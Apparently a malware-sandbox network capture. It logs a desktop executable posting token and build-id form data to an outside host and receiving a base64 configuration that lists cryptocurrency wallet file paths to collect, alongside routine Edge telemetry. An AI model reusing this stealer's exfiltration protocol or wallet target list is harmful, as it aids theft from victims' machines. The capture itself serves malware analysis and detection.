                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 33 4f 48 4c 46 55 4b 36 46 33 45 33 45 43 54 52 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 46 33 4f 48 4c 46 55 4b 36 46 33 45 33 45 43 54 52 49 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 46 33 4f 48 4c 46 55 4b 36 46 33 45 33 45 43 54 52 49 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------F3OHLFUK6F3E3ECTRI5FContent-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------F3OHLFUK6F3E3ECTRI5FContent-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------F3OHLFUK6F3E3ECTRI5FCont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:48 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:55 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                51192.168.2.649953108.139.47.924432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC1012OUTGET /b2?rn=1734676307694&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=015EFEE8056263FB2030EBB304006296&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: UID=1921a3731edec7d894bcea01734676308; XID=1921a3731edec7d894bcea01734676308
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                                X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                                Via: 1.1 fa2a1404411f25eb7c3c4def0c2864e6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: S02CVsFXnnPoNr9o0PRvXXzjLXDP6TmWoLBYi39jUFovotLhM3aAQg==


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                52192.168.2.649959116.203.12.1144431468C:\Users\user\Desktop\ktyihkdfesf.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----L68GDJMO89RIM7GLNOZ5
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                Host: frostman.shop
                                                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 4a 4d 4f 38 39 52 49 4d 37 47 4c 4e 4f 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 38 39 66 35 66 34 30 37 33 38 63 35 64 63 33 66 31 38 66 39 36 37 36 65 66 30 36 39 34 38 66 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 4a 4d 4f 38 39 52 49 4d 37 47 4c 4e 4f 5a 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 65 34 32 36 62 33 31 39 65 37 38 66 38 39 65 36 36 64 31 61 63 62 37 36 37 36 64 30 39 33 0d 0a 2d 2d 2d 2d 2d 2d 4c 36 38 47 44 4a 4d 4f 38 39 52 49 4d 37 47 4c 4e 4f 5a 35 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                Data Ascii: ------L68GDJMO89RIM7GLNOZ5Content-Disposition: form-data; name="token"889f5f40738c5dc3f18f9676ef06948f------L68GDJMO89RIM7GLNOZ5Content-Disposition: form-data; name="build_id"d3e426b319e78f89e66d1acb7676d093------L68GDJMO89RIM7GLNOZ5Cont
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                Date: Fri, 20 Dec 2024 06:31:50 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:51 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                53192.168.2.64995152.178.17.24432168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734676307692&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                Content-Length: 3821
                                                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                Cookie: _C_ETH=1; USRLOC=; MUID=015EFEE8056263FB2030EBB304006296; _EDGE_S=F=1&SID=118F174EC8CC63DC31DB0215C90D62A3; _EDGE_V=1
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC3821OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 30 54 30 36 3a 33 31 3a 34 37 2e 36 38 38 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 35 36 66 31 64 37 32 35 2d 30 65 36 31 2d 34 38 63 32 2d 38 31 63 62 2d 38 30 31 34 33 61 31 36 32 30 61 35 22 2c 22 65 70 6f 63 68 22 3a 22 39 30 32 32 38 38 36 36 36 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                                Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-20T06:31:47.688Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"56f1d725-0e61-48c2-81cb-80143a1620a5","epoch":"902288666"},"app":{"locale"
                                                                                                                                                                                                                                                                                                2024-12-20 06:31:50 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=58d265ec1c564a6db2221916674de664&HASH=58d2&LV=202412&V=4&LU=1734676310511; Domain=.microsoft.com; Expires=Sat, 20 Dec 2025 06:31:50 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                Set-Cookie: MS0=86037c92766a4dc29982f393a4f0d85d; Domain=.microsoft.com; Expires=Fri, 20 Dec 2024 07:01:50 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                time-delta-millis: 2819
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
